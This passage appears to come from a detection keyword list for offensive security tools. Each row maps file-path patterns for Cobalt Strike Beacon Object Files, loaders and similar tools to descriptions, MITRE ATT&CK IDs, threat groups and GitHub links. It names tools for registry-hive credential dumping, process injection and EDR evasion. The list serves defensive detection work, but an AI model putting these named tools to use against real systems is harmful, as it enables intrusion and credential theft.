- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*/bof.x64.o*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof.x64.o*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof.x86.o*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof.x86.o*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof/bof.c,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof/bof.vcxproj*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof/IABOF*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/bof/IAStart.asm*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/BOF-Builder*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*/bof-collection/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/bofhound.git*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/BOFMask.git*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*/bofmask.h*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*/BOFNETExamples/*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/BOF-RegSave*,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*/BofRunner.cs*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/BOFs.git*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*/bof-vs-template/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof-vs-template/*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/boko.py*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*/boku7/spawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/boku7/whereami/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*/BokuLoader.c*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BokuLoader.h*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 